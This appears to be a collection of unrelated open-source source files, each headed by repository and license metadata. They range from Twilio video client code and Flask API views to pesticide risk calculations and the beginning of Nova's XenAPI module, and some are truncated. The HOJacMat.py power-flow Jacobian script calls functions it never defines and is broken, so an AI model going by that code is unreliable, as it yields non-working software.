:rtype: list[twilio.rest.video.v1.room.room_participant.room_participant_subscribed_track.SubscribedTrackInstance]
"""
return list(self.stream(limit=limit, page_size=page_size, ))
def page(self, page_token=values.unset, page_number=values.unset,
page_size=values.unset):
"""
Retrieve a single page of SubscribedTrackInstance records from the API.
Request is executed immediately
:param str page_token: PageToken provided by the API
:param int page_number: Page Number, this value is simply for client state
:param int page_size: Number of records to return, defaults to 50
:returns: Page of SubscribedTrackInstance
:rtype: twilio.rest.video.v1.room.room_participant.room_participant_subscribed_track.SubscribedTrackPage
"""
params = values.of({'PageToken': page_token, 'Page': page_number, 'PageSize': page_size, })
response = self._version.page(
'GET',
self._uri,
params=params,
)
return SubscribedTrackPage(self._version, response, self._solution)
def get_page(self, target_url):
"""
Retrieve a specific page of SubscribedTrackInstance records from the API.
Request is executed immediately
:param str target_url: API-generated URL for the requested results page
:returns: Page of SubscribedTrackInstance
:rtype: twilio.rest.video.v1.room.room_participant.room_participant_subscribed_track.SubscribedTrackPage
"""
response = self._version.domain.twilio.request(
'GET',
target_url,
)
return SubscribedTrackPage(self._version, response, self._solution)
def get(self, sid):
"""
Constructs a SubscribedTrackContext
:param sid: The SID that identifies the resource to fetch
:returns: twilio.rest.video.v1.room.room_participant.room_participant_subscribed_track.SubscribedTrackContext
:rtype: twilio.rest.video.v1.room.room_participant.room_participant_subscribed_track.SubscribedTrackContext
"""
return SubscribedTrackContext(
self._version,
room_sid=self._solution['room_sid'],
participant_sid=self._solution['participant_sid'],
sid=sid,
)
def __call__(self, sid):
"""
Constructs a SubscribedTrackContext
:param sid: The SID that identifies the resource to fetch
:returns: twilio.rest.video.v1.room.room_participant.room_participant_subscribed_track.SubscribedTrackContext
:rtype: twilio.rest.video.v1.room.room_participant.room_participant_subscribed_track.SubscribedTrackContext
"""
return SubscribedTrackContext(
self._version,
room_sid=self._solution['room_sid'],
participant_sid=self._solution['participant_sid'],
sid=sid,
)
def __repr__(self):
"""
Provide a friendly representation
:returns: Machine friendly representation
:rtype: str
"""
return '<Twilio.Video.V1.SubscribedTrackList>'
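# Illustrative usage sketch (added for clarity, not part of the original file); the
# credentials and SIDs below are hypothetical:
#   from twilio.rest import Client
#   client = Client(account_sid, auth_token)
#   tracks = client.video.rooms('RMxxxxxxxx').participants('PAxxxxxxxx') \
#       .subscribed_tracks.list(limit=20)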
class SubscribedTrackPage(Page):
""" """
def __init__(self, version, response, solution):
"""
Initialize the SubscribedTrackPage
:param Version version: Version that contains the resource
:param Response response: Response from the API
:param room_sid: The SID of the room where the track is published
:param participant_sid: The SID of the participant that subscribes to the track
:returns: twilio.rest.video.v1.room.room_participant.room_participant_subscribed_track.SubscribedTrackPage
:rtype: twilio.rest.video.v1.room.room_participant.room_participant_subscribed_track.SubscribedTrackPage
"""
super(SubscribedTrackPage, self).__init__(version, response)
# Path Solution
self._solution = solution
def get_instance(self, payload):
"""
Build an instance of SubscribedTrackInstance
:param dict payload: Payload response from the API
:returns: twilio.rest.video.v1.room.room_participant.room_participant_subscribed_track.SubscribedTrackInstance
:rtype: twilio.rest.video.v1.room.room_participant.room_participant_subscribed_track.SubscribedTrackInstance
"""
        return SubscribedTrackInstance(
self._version,
payload,
room_sid=self._solution['room_sid'],
participant_sid=self._solution['participant_sid'],
)
def __repr__(self):
"""
        Provide a friendly representation
        :returns: Machine friendly representation
|
leeroybrun/heigvd-timetable-parser
|
setup.py
|
Python
|
mit
| 604
| 0.036484
|
#!/usr/bin/python
# coding=utf-8
from setuptools import setup, find_packages
setup(
name = "HEIGVD_TimetableParser",
version = "0.1",
packages = find_packages(),
    install_requires = ['icalendar>=3.5', 'xlrd>=0.9.2'],
# metadata for upload to PyPI
author = "Leeroy Brun",
author_email = "leeroy.brun@gmail.com",
description = "Transforme un horaire au format XLS provenant de l'intranet du département FEE de la HEIG-VD en un fichier ICS.",
license = "MIT",
keywords = "heig-vd ics xls fee",
url = "https://github.com/leeroyb
|
run/heigvd-timetable-parser",
)
|
willmcgugan/rich
|
tests/test_styled.py
|
Python
|
mit
| 471
| 0.002123
|
import io
from rich.console import Console
from rich.measure import Measurement
from rich.styled import Styled
def test_styled():
styled_foo = Styled("foo", "on red")
console = Console(file=io.StringIO(), force_terminal=True, _environ={})
assert Measurement.get(console, console.options, styled_foo) == Measurement(3, 3)
console.print(styled_foo)
result = console.file.getvalue()
expected = "\x1b[41mfoo\x1b[0m\n"
    assert result == expected
|
puruckertom/ubertool
|
ubertool/terrplant/terrplant_functions.py
|
Python
|
unlicense
| 20,304
| 0.006403
|
from __future__ import division #brings in Python 3.0 mixed type calculation rules
import logging
import numpy as np
import pandas as pd
class TerrplantFunctions(object):
"""
Function class for Stir.
"""
def __init__(self):
"""Class representing the functions for Sip"""
super(TerrplantFunctions, self).__init__()
def run_dry(self):
"""
EEC for runoff for dry areas
"""
self.out_run_dry = (self.application_rate / self.incorporation_depth) * self.runoff_fraction
return self.out_run_dry
def run_semi(self):
"""
EEC for runoff to semi-aquatic areas
"""
self.out_run_semi = (self.application_rate / self.incorporation_depth) * self.runoff_fraction * 10
return self.out_run_semi
    def spray(self):
"""
EEC for spray drift
"""
self.out_spray = self.application_rate * self.drift_fraction
return self.out_spray
def total_dry(self):
"""
EEC total for dry areas
"""
        self.out_total_dry = self.out_run_dry + self.out_spray
return self.out_total_dry
def total_semi(self):
"""
EEC total for semi-aquatic areas
"""
self.out_total_semi = self.out_run_semi + self.out_spray
return self.out_total_semi
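    # Worked example (illustrative only; the input values below are hypothetical):
    # with application_rate = 1.0, incorporation_depth = 1.0, runoff_fraction = 0.05
    # and drift_fraction = 0.01, out_run_dry = 0.05, out_run_semi = 0.5 and
    # out_spray = 0.01, giving out_total_dry = 0.06 and out_total_semi = 0.51.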
def nms_rq_dry(self):
"""
Risk Quotient for NON-LISTED MONOCOT seedlings exposed to Pesticide X in a DRY area
"""
self.out_nms_rq_dry = self.out_total_dry / self.ec25_nonlisted_seedling_emergence_monocot
return self.out_nms_rq_dry
def loc_nms_dry(self):
"""
Level of concern for non-listed monocot seedlings exposed to pesticide X in a dry area
"""
msg_pass = "The risk quotient for non-listed monocot seedlings exposed to the pesticide via runoff to dry areas indicates a potential risk."
msg_fail = "The risk quotient for non-listed monocot seedlings exposed to the pesticide via runoff to dry areas indicates that potential risk is minimal."
boo_ratios = [ratio >= 1.0 for ratio in self.out_nms_rq_dry]
self.out_nms_loc_dry = pd.Series([msg_pass if boo else msg_fail for boo in boo_ratios])
# exceed_boolean = self.out_nms_rq_dry >= 1.0
# self.out_nms_loc_dry = exceed_boolean.map(lambda x:
# 'The risk quotient for non-listed monocot seedlings exposed to the pesticide via runoff to dry areas indicates a potential risk.' if x == True
# else 'The risk quotient for non-listed monocot seedlings exposed to the pesticide via runoff to dry areas indicates that potential risk is minimal.')
return self.out_nms_loc_dry
def nms_rq_semi(self):
"""
Risk Quotient for NON-LISTED MONOCOT seedlings exposed to Pesticide X in a SEMI-AQUATIC area
"""
self.out_nms_rq_semi = self.out_total_semi / self.ec25_nonlisted_seedling_emergence_monocot
return self.out_nms_rq_semi
def loc_nms_semi(self):
"""
Level of concern for non-listed monocot seedlings exposed to pesticide X in a semi-aquatic area
"""
msg_pass = "The risk quotient for non-listed monocot seedlings exposed to the pesticide via runoff to semi-aquatic areas indicates a potential risk."
msg_fail = "The risk quotient for non-listed monocot seedlings exposed to the pesticide via runoff to semi-aquatic areas indicates that potential risk is minimal."
boo_ratios = [ratio >= 1.0 for ratio in self.out_nms_rq_semi]
self.out_nms_loc_semi = pd.Series([msg_pass if boo else msg_fail for boo in boo_ratios])
#exceed_boolean = self.out_nms_rq_semi >= 1.0
#self.out_nms_loc_semi = exceed_boolean.map(lambda x:
# 'The risk quotient for non-listed monocot seedlings exposed to the pesticide via runoff to semi-aquatic areas indicates a potential risk.' if x == True
# else 'The risk quotient for non-listed monocot seedlings exposed to the pesticide via runoff to semi-aquatic areas indicates that potential risk is minimal.')
return self.out_nms_loc_semi
def nms_rq_spray(self):
"""
Risk Quotient for NON-LISTED MONOCOT seedlings exposed to Pesticide X via SPRAY drift
"""
self.out_nms_rq_spray = self.out_spray / self.out_min_nms_spray
return self.out_nms_rq_spray
def loc_nms_spray(self):
"""
Level of concern for non-listed monocot seedlings exposed to pesticide via spray drift
"""
msg_pass = "The risk quotient for non-listed monocot seedlings exposed to the pesticide via spray drift indicates a potential risk."
msg_fail = "The risk quotient for non-listed monocot seedlings exposed to the pesticide via spray drift indicates that potential risk is minimal."
boo_ratios = [ratio >= 1.0 for ratio in self.out_nms_rq_spray]
self.out_nms_loc_spray = pd.Series([msg_pass if boo else msg_fail for boo in boo_ratios])
#exceed_boolean = self.out_nms_rq_spray >= 1.0
#self.out_nms_loc_spray = exceed_boolean.map(lambda x:
# 'The risk quotient for non-listed monocot seedlings exposed to the pesticide via spray drift indicates a potential risk.' if x == True
# else 'The risk quotient for non-listed monocot seedlings exposed to the pesticide via spray drift indicates that potential risk is minimal.')
return self.out_nms_loc_spray
def lms_rq_dry(self):
"""
Risk Quotient for LISTED MONOCOT seedlings exposed to Pesticide X in a DRY areas
"""
self.out_lms_rq_dry = self.out_total_dry / self.noaec_listed_seedling_emergence_monocot
return self.out_lms_rq_dry
def loc_lms_dry(self):
"""
Level of concern for listed monocot seedlings exposed to pesticide via runoff in a dry area
"""
msg_pass = "The risk quotient for listed monocot seedlings exposed to the pesticide via runoff to dry areas indicates a potential risk."
msg_fail = "The risk quotient for listed monocot seedlings exposed to the pesticide via runoff to dry areas indicates that potential risk is minimal."
boo_ratios = [ratio >= 1.0 for ratio in self.out_lms_rq_dry]
self.out_lms_loc_dry = pd.Series([msg_pass if boo else msg_fail for boo in boo_ratios])
#exceed_boolean = self.out_lms_rq_dry >= 1.0
#self.out_lms_loc_dry = exceed_boolean.map(lambda x:
# 'The risk quotient for listed monocot seedlings exposed to the pesticide via runoff to dry areas indicates a potential risk.' if x == True
# else 'The risk quotient for listed monocot seedlings exposed to the pesticide via runoff to dry areas indicates that potential risk is minimal.')
return self.out_lms_loc_dry
def lms_rq_semi(self):
"""
Risk Quotient for LISTED MONOCOT seedlings exposed to Pesticide X in a SEMI-AQUATIC area
"""
self.out_lms_rq_semi = self.out_total_semi / self.noaec_listed_seedling_emergence_monocot
return self.out_lms_rq_semi
def loc_lms_semi(self):
"""
Level of concern for listed monocot seedlings exposed to pesticide X in semi-aquatic areas
"""
msg_pass = "The risk quotient for listed monocot seedlings exposed to the pesticide via runoff to semi-aquatic areas indicates a potential risk."
msg_fail = "The risk quotient for listed monocot seedlings exposed to the pesticide via runoff to semi-aquatic areas indicates that potential risk is minimal."
boo_ratios = [ratio >= 1.0 for ratio in self.out_lms_rq_semi]
self.out_lms_loc_semi = pd.Series([msg_pass if boo else msg_fail for boo in boo_ratios])
#exceed_boolean = self.out_lms_rq_semi >= 1.0
#self.out_lms_loc_semi = exceed_boolean.map(lambda x:
# 'The risk quotient for list
|
rchrd2/django-cache-decorator
|
setup.py
|
Python
|
mit
| 596
| 0.041946
|
from setuptools import setup
version = '0.4'
setup(
    name = 'django-cache-decorator',
packages = ['django_cache_decorator'],
license = 'MIT',
version = version,
description = 'Easily add caching to functions within a django project.',
long_description=open('README.md').read(),
author = 'Richard Caceres',
author_email = 'me@rchrd.net',
url = 'https://github.com/rchrd2/django-cache-decorator/',
download_url = 'https://github.com/rchrd2/django-cache-decorator/tarball/' + version,
    keywords = ['django','caching','decorator'],
classifiers = [],
)
|
LuizArmesto/gastos_abertos
|
gastosabertos/contratos/views.py
|
Python
|
agpl-3.0
| 13,828
| 0.005496
|
# -*- coding: utf-8 -*-
import os
import json
from sqlalchemy import and_, extract, func, desc
from datetime import datetime
from jinja2 import TemplateNotFound
from flask import Blueprint, render_template, send_from_directory, abort, request
from flask.ext.paginate import Pagination
from flask.ext import restful
from flask.ext.restful import fields
from flask.ext.restful.reqparse import RequestParser
from .models import Contrato
from gastosabertos.extensions import db
# Blueprint for Contrato
contratos = Blueprint('contratos', __name__,
template_folder='templates',
static_folder='static',
static_url_path='/contrato/static')
# Create the restful API
contratos_api = restful.Api(contratos, prefix="/api/v1")
# receita_api.decorators = [cors.crossdomain(origin='*')]
# class Date(fields.Raw):
# def format(self, value):
# return str(value)
# Parser for RevenueAPI arguments
contratos_list_parser = RequestParser()
contratos_list_parser.add_argument('cnpj')
contratos_list_parser.add_argument('orgao')
contratos_list_parser.add_argument('modalidade')
contratos_list_parser.add_argument('evento')
contratos_list_parser.add_argument('objeto')
contratos_list_parser.add_argument('processo_administrativo')
contratos_list_parser.add_argument('nome_fornecedor')
contratos_list_parser.add_argument('licitacao')
contratos_list_parser.add_argument('group_by', default='')
contratos_list_parser.add_argument('order_by', 'id')
contratos_list_parser.add_argument('page', type=int, default=0)
contratos_list_parser.add_argument('per_page_num', type=int, default=100)
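# Illustrative request (added for clarity, not part of the original file): the list
# endpoint registered below accepts these arguments as query-string parameters, e.g.
# (ignoring any extra prefix applied when the blueprint is registered):
#   GET /api/v1/contrato/list?nome_fornecedor=acme&order_by=-valor&page=0&per_page_num=50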
# Fields for ContratoAPI data marshal
contratos_fields = { 'id': fields.Integer()
, 'orgao': fields.String()
, 'data_assinatura': fields.DateTime(dt_format='iso8601')
, 'vigencia': fields.Integer()
, 'objeto': fields.String()
, 'modalidade': fields.String()
, 'evento': fields.String()
, 'processo_administrativo': fields.String()
, 'cnpj': fields.String()
, 'nome_fornecedor': fields.String()
, 'valor': fields.Float()
, 'licitacao': fields.String()
, 'data_publicacao': fields.DateTime(dt_format='iso8601') }
class ContratoApi(restful.Resource):
def filter(self, contratos_data):
# Extract the arguments in GET request
args = contratos_list_parser.parse_args()
cnpj = args['cnpj']
nome_fornecedor = args['nome_fornecedor']
orgao = args['orgao']
modalidade = args['modalidade']
evento = args['evento']
objeto = args['objeto']
processo_administrativo = args['processo_administrativo']
licitacao = args['licitacao']
if cnpj:
contratos_data = contratos_data.filter(Contrato.cnpj == cnpj)
if nome_fornecedor:
nome_query = u'%{}%'.format(nome_fornecedor)
contratos_data = contratos_data.filter(Contrato.nome_fornecedor.ilike(nome_query))
if orgao:
orgao_query = u'%{}%'.format(orgao)
contratos_data = contratos_data.filter(Contrato.orgao.ilike(orgao_query))
if modalidade:
modalidade_query = u'%{}%'.format(modalidade)
contratos_data = contratos_data.filter(Contrato.modalidade.ilike(modalidade_query))
if evento:
evento_query = u'%{}%'.format(evento)
contratos_data = contratos_data.filter(Contrato.evento.ilike(evento_query))
if objeto:
objeto_query = u'%{}%'.format(objeto)
contratos_data = contratos_data.filter(Contrato.objeto.ilike(objeto_query))
if processo_administrativo:
processo_administrativo_query = u'%{}%'.format(processo_administrativo)
contratos_data = contratos_data.filter(Contrato.processo_administrativo.ilike(processo_administrativo_query))
if licitacao:
licitacao_query = u'%{}%'.format(licitacao)
contratos_data = contratos_data.filter(Contrato.licitacao.ilike(licitacao_query))
return contratos_data
def order(self, contratos_data):
args = contratos_list_parser.parse_args()
order_by = args['order_by'].split(',')
if order_by:
order_by_args = []
for field_name in order_by:
desc_ = False
if field_name.startswith('-'):
field_name = field_name[1:]
desc_ = True
if field_name in contratos_fields or field_name == 'count':
order_by_arg = field_name
if desc_:
order_by_arg = desc(order_by_arg)
order_by_args.append(order_by_arg)
contratos_data = contratos_data.order_by(*order_by_args)
return contratos_data
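    # Worked example (hypothetical query, added for clarity): with
    # ?order_by=-valor,id the loop above builds [desc('valor'), 'id'], i.e.
    # results are sorted by valor descending with ties broken by ascending id;
    # names that are neither in contratos_fields nor 'count' are ignored.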
def paginate(self, contratos_data):
args = contratos_list_parser.parse_args()
page = args['page']
per_page_num = args['per_page_num']
        # Limit the number of results per page
contratos_data = contratos_data.offset(page*per_page_num).limit(per_page_num)
return contratos_data
class ContratoListApi(ContratoApi):
@restful.marshal_with(contratos_fields)
def get(self):
contratos_data = db.session.query(Contrato)
contratos_data = self.order(contratos_data)
contratos_data = self.filter(contratos_data)
headers = {
# Add 'Access-Control-Expose-Headers' header here is a workaround
# until Flask-Restful adds support to it.
'Access-Control-Expose-Headers': 'X-Total-Count',
'X-Total-Count': contratos_data.count()
}
contratos_data = self.paginate(contratos_data)
return contratos_data.all(), 200, headers
contratos_api.add_resource(ContratoListApi, '/contrato/list')
class ContratoAggregateApi(ContratoApi):
def get(self):
args = contratos_list_parser.parse_args()
group_by = args['group_by'].split(',')
group_by_fields = []
# Always return a count
query_args = [func.count(Contrato.id).label('count')]
keys = []
temporary_keys = []
partial_fields = []
# Tuples with SQLAlchemy function and args to get parts of values.
# This allows to group by years or months for example.
parts = {
'year': (lambda field: [func.extract('year', field)],
lambda values: list(values)[0]),
'month': (lambda field: [func.extract('year', field), func.extract('month', field)],
lambda values: '-'.join([format(v, '02') for v in values])),
'day': (lambda field: [func.extract('year', field), func.extract('month', field), func.extract('day', field)],
lambda values: '-'.join([format(v, '02') for v in values])),
}
for field_name in group_by:
part = None
if field_name.endswith(tuple(map(lambda a: '__{}'.format(a), parts.keys()))):
# User asked to group using only part of value.
# Get the original field name and which part we should use.
# "?group_by=data_publicacao__year" results in
# field_name = 'data_publicacao'
# part = 'year'
field_name, part = field_name.split('__', 1)
if field_name in contratos_fields:
group_by_field = [getattr(Contrato, field_name)]
if part:
# Apply the "part" function
group_by_field = parts[part][0](group_by_field[0])
temporary_keys.extend(['{}__{}'.format(field_name, i) for i in range(len(group_by_field))])
partial_fields.append({
'field_name': field_name,
'count': len(group_by_field),
'part_name': part,
})
else:
                    keys.append(field_name)
|
ATNF/askapsdp
|
Code/Base/py-accessor/current/askap/accessors/__init__.py
|
Python
|
gpl-2.0
| 991
| 0
|
# Copyright (c) 2011 CSIRO
# Australia Telescope National Facility (ATNF)
# Commonwealth Scientific and Industrial Research Organisation (CSIRO)
# PO Box 76, Epping NSW 1710, Australia
# atnf-enquiries@csiro.au
#
# This file is part of the ASKAP software distribution.
#
# The ASKAP software distribution is free software: you can redistribute it
# and/or modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 2 of the License
# or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA.
#
|
lealhugui/schema-analyser
|
app/server/api/migrations/0003_tablefield_inner_type.py
|
Python
|
mit
| 467
| 0
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11 on 2017-05-09 13:44
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('api', '0002_tablefield_allow_null'),
]
operations = [
migrations.AddField(
model_name='tablefield',
name='inner_type',
            field=models.CharField(default='', max_length=250),
),
]
|
chaosmaker/pyload
|
module/plugins/accounts/RyushareCom.py
|
Python
|
gpl-3.0
| 742
| 0.001348
|
# -*- coding: utf-8 -*-
from module.plugins.internal.XFSPAccount import XFSPAccount
class RyushareCom(XFSPAccount):
__name__ = "RyushareCom"
__version__ = "0.03"
__type__ = "account"
__description__ = """ryushare.com account plugin"""
__author_name__ = ("zoidberg", "trance4us")
__author_mail__ = ("zoidberg@mujmail.cz", "")
MAIN_PAGE = "http://ryushare.com/"
    def login(self, user, data, req):
req.lastURL = "http://ryushare.com/login.python"
html = req.load("http://ryushare.com/login.python",
post={"login": user, "password":
|
data["password"], "op": "login"})
if 'Incorrect Login or Password' in html or '>Error<' in html:
self.wrongPassword()
|
bitmingw/hexomega
|
assets/HOJacMat.py
|
Python
|
mit
| 2,566
| 0.011302
|
from numpy import matrix, zeros
# integer Size; integer nPQ, Matrix G; Matrix B; Array U
def JacMat(Size, nPQ, G, B, U):
    # Method Of Every Entry Of Jacobian Matrix
f = U.real
e = U.imag
    JacMat = zeros((Size, Size))
def Hij(B, G, e, f):
        return -B*e+G*f
def Nij(B, G, e, f):
        return G*e+B*f
def Jij(B, G, e, f):
return -B*f-G*e
def Lij(B, G, e, f):
        return -B*e+G*f
def Rij():
return 0
def Sij():
return 0
def Aii(GM, BM, eA, fA, i):
aii = 0
for j in range(1, len(eA)):
aii = aii + G[i][j]*e[j]-B[i][j]*f[j]
return aii
def Bii(GM, BM, eA, fA, i):
bii = 0
for j in range(1, len(eA)):
bii = bii + G[i][j]*f[j]+B[i][j]*e[j]
return bii
if isSquareM(B)==True and isSquareM(G)==True and len(B) == len(G) == G.dim == B.dim:
        # Build Jacobian Matrix
for m in range(0, Size, 2): #H
            for n in range(0, Size, 2):
if m==n:
JacMat[m][n] = Hii(B[m][m], G[m][m], e[m], f[m])
else:
JacMat[m][n] = Hij(B[m][n], G[m][n], e[m], f[m])
for m in range(0, Size, 2): #N
for n in range(1, Size, 2):
if m==n:
JacMat[m][n] = Nii(B[m][m], G[m][m], e[m], f[m])
else:
JacMat[m][n] = Nij(B[m][n], G[m][n], e[m], f[m])
for m in range(1, Size, 2): #J
for n in range(0, nPQ*2, 2):
if m==n:
JacMat[m][n] = Jii(B[m][m], G[m][m], e[m], f[m])
else:
JacMat[m][n] = Jij(B[m][n], G[m][n], e[m], f[m])
for m in range(1, Size, 2): #L
for n in range(1, nPQ*2, 2):
if m==n:
JacMat[m][n] = Lii(B[m][m], G[m][m], e[m], f[m])
else:
JacMat[m][n] = Lij(B[m][n], G[m][n], e[m], f[m])
for m in range(1, Size, 2): #R
for n in range(1, nPQ*2, 2):
if m==n:
JacMat[m][n] = Rii(f[m])
else:
JacMat[m][n] = Rij()
for m in range(1, Size, 2): #S
for n in range(nPQ*2+1, Size, 2):
if m==n:
JacMat[m][n] = Sii(e[m])
else:
JacMat[m][n] = Sij()
print JacMat
return JacMat
else:
print "Parameter Unmatched"
return False
|
rafaelnsantos/batfinancas
|
batfinancas/wsgi.py
|
Python
|
mit
| 399
| 0
|
"""
WSGI config for batfinancas project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/1.9/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "batfinancas.settings")
application = get_wsgi_application()
|
zrax/moul-scripts
|
Python/xPodBahroSymbol.py
|
Python
|
gpl-3.0
| 6,228
| 0.006744
|
# -*- coding: utf-8 -*-
""" *==LICENSE==*
CyanWorlds.com Engine - MMOG client, server and tools
Copyright (C) 2011 Cyan Worlds, Inc.
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
Additional permissions under GNU GPL version 3 section 7
If you modify this Program, or any covered work, by linking or
combining it with any of RAD Game Tools Bink SDK, Autodesk 3ds Max SDK,
NVIDIA PhysX SDK, Microsoft DirectX SDK, OpenSSL library, Independent
JPEG Group JPEG library, Microsoft Windows Media SDK, or Apple QuickTime SDK
(or a modified version of those libraries),
containing parts covered by the terms of the Bink SDK EULA, 3ds Max EULA,
PhysX SDK EULA, DirectX SDK EULA, OpenSSL and SSLeay licenses, IJG
JPEG Library README, Windows Media SDK EULA, or QuickTime SDK EULA, the
licensors of this Program grant you additional
permission to convey the resulting work. Corresponding Source for a
non-source form of such a combination shall include the source code for
the parts of OpenSSL and IJG JPEG Library used as well as that of the covered
work.
You can contact Cyan Worlds, Inc. by email legal@cyan.com
or by snail mail at:
Cyan Worlds, Inc.
14617 N Newport Hwy
Mead, WA 99021
*==LICENSE==* """
"""
Module: xPodBahroSymbol
Age: Global
Date: January 2007
Author: Derek Odell
"""
from Plasma import *
from PlasmaTypes import *
import random
# define the attributes that will be entered in max
respBahroSymbol = ptAttribResponder(1, "resp: Bahro Symbol", ["beginning","middle","end"], netForce=1)
SymbolAppears = ptAttribInt(2, "Frame the Symbol Appears", 226, (0,5000))
DayFrameSize = ptAttribInt(3, "Frames in One Day", 2000, (0,5000))
animMasterDayLight = ptAttribAnimation(4, "Master Animation Object")
respSFX = ptAttribResponder(5, "resp: Symbol SFX", ["stop","play"],netForce = 1)
# define globals
kDayLengthInSeconds = 56585.0
# The max file "full day" animation in Payiferen is 2000 frames
# or 66.666 (2000 / 30) seconds long. We need it to last 56585
# seconds which means the animation needs to be played back at
# 0.035345 (2000 / 56585) frames per second. Which means animation
# speed needs to be set to 0.0011781666 ((2000 / 56585) / 30)
kDayAnimationSpeed = (DayFrameSize.value / kDayLengthInSeconds) / 30.0
# The Bahro symbol is set to trigger on frame 226 of 2000 which
# is 11.3% (226 / 2000) into the day. 11.3% into a 56585 second
# day is 6394.105 seconds (56585 * 0.113). That gives us our base
# point for every other age that needs the Bahro symbol.
kTimeWhenSymbolAppears = kDayLengthInSeconds * (float(SymbolAppears.value) / float(DayFrameSize.value))
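# Worked numbers (added for clarity, assuming the default attribute values
# SymbolAppears=226 and DayFrameSize=2000 declared above):
#   kDayAnimationSpeed     = (2000 / 56585.0) / 30.0   ~= 0.0011782
#   kTimeWhenSymbolAppears = 56585.0 * (226 / 2000.0)  ~= 6394.1 seconds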
#====================================
class xPodBahroSymbol(ptResponder):
###########################
def __init__(self):
ptResponder.__init__(self)
self.id = 5240
version = 1
self.version = version
print "__init__xPodBahroSymbol v.", version,".0"
random.seed()
###########################
def OnServerInitComplete(self):
self.ISetTimers()
respSFX.run(self.key, state="stop")
if type(animMasterDayLight.value) != type(None):
timeIntoMasterAnim = PtGetAgeTimeOfDayPercent() * (DayFrameSize.value / 30.0)
print "xPodBahroSymbol.OnServerInitComplete: Master anim is skipping to %f seconds and playing at %f speed" % (timeIntoMasterAnim, kDayAnimationSpeed)
animMasterDayLight.animation.skipToTime(timeIntoMasterAnim)
animMasterDayLight.animation.speed(kDayAnimationSpeed)
animMasterDayLight.animation.resume()
###########################
def OnNotify(self,state,id,events):
print "xPodBahroSymbol.OnNotify: state=%f id=%d events=" % (state,id),events
if id == respBahroSymbol.id:
PtAtTimeCallback(self.key, 32, 3)
###########################
def OnTimer(self,TimerID):
print "xPodBahroSymbol.OnTimer: callback id=%d" % (TimerID)
if self.sceneobject.isLocallyOwned():
if TimerID == 1:
respBahroSymbol.run(self.key, state="beginning")
respSFX.run(self.key, state="play")
elif TimerID == 2:
self.ISetTimers()
elif TimerID == 3:
respBahroSymbol.run(self.key, state="end")
respSFX.run(self.key, state="stop")
###########################
def ISetTimers(self):
beginningOfToday = PtGetDniTime() - int(PtGetAgeTimeOfDayPercent() * kDayLengthInSeconds)
timeWhenSymbolAppearsToday = beginningOfToday + kTimeWhenSymbolAppears
if timeWhenSymbolAppearsToday > PtGetDniTime():
timeTillSymbolAppears = timeWhenSymbolAppearsToday - PtGetDniTime()
PtAtTimeCallback(self.key, timeTillSymbolAppears, 1)
print "xGlobalDoor.key: %d%s" % (random.randint(0,100), hex(int(timeTillSymbolAppears + 1234)))
else:
print "xPodBahroSymbol: You missed the symbol for today."
timeLeftToday = kDayLengthInSeconds - int(PtGetAgeTimeOfDayPercent() * kDayLengthInSeconds)
timeLeftToday += 1 # because we want it to go off right AFTER the day flips
PtAtTimeCallback(self.key, timeLeftToday, 2)
print "xPodBahroSymbol: Tomorrow starts in %d seconds" % (timeLeftToday)
###########################
def OnBackdoorMsg(self, target, param):
if target == "bahro":
if self.sceneobject.isLocallyOwned():
print "xPodBahroSymbol.OnBackdoorMsg: Work!"
if param == "appear":
PtAtTimeCallback(self.key, 1, 1)
|
tescalada/npyscreen-restructure
|
tests/testMonthbox.py
|
Python
|
bsd-2-clause
| 337
| 0.011869
|
#!/bin/env python
import npyscreen
class MainFm(npyscreen.Form):
def create(self):
self.mb = self.add(npyscreen.MonthBox,
use_datetime = True)
class TestApp(npyscreen.NPSAppManaged):
def onStart(self):
        self.addForm("MAIN", MainFm)
if __name__ == "__main__":
A = TestApp()
A.run()
|
sridevikoushik31/nova
|
nova/virt/xenapi/vmops.py
|
Python
|
apache-2.0
| 88,390
| 0.000645
|
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright (c) 2010 Citrix Systems, Inc.
# Copyright 2010 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Management class for VM-related functions (spawn, reboot, etc).
"""
import functools
import itertools
import time
from eventlet import greenthread
import netaddr
from oslo.config import cfg
from nova import block_device
from nova.compute import api as compute
from nova.compute import flavors
from nova.compute import power_state
from nova.compute import task_states
from nova.compute import vm_mode
from nova.compute import vm_states
from nova import context as nova_context
from nova import exception
from nova.image import glance
from nova.openstack.common import excutils
from nova.openstack.common import importutils
from nova.openstack.common import jsonutils
from nova.openstack.common import log as logging
from nova.openstack.common import timeutils
from nova import utils
from nova.virt import configdrive
from nova.virt import driver as virt_driver
from nova.virt import firewall
from nova.virt.xenapi import agent as xapi_agent
from nova.virt.xenapi import pool_states
from nova.virt.xenapi import vm_utils
from nova.virt.xenapi import volume_utils
from nova.virt.xenapi import volumeops
LOG = logging.getLogger(__name__)
xenapi_vmops_opts = [
cfg.IntOpt('xenapi_running_timeout',
default=60,
help='number of seconds to wait for instance '
'to go to running state'),
cfg.StrOpt('xenapi_vif_driver',
